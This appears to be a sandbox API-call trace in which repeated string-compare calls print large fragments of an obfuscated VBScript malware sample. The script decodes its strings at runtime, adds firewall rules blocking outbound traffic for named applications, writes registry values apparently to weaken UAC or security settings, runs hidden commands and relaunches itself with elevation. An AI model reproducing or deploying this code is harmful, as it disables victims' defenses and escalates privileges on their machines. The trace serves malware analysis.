1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.002] wcsncmp (_String1="\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.002] wcsncmp (_String1="\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.002] wcsncmp (_String1="if (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.002] wcsncmp (_String1="f (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0223.002] wcsncmp (_String1=" (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 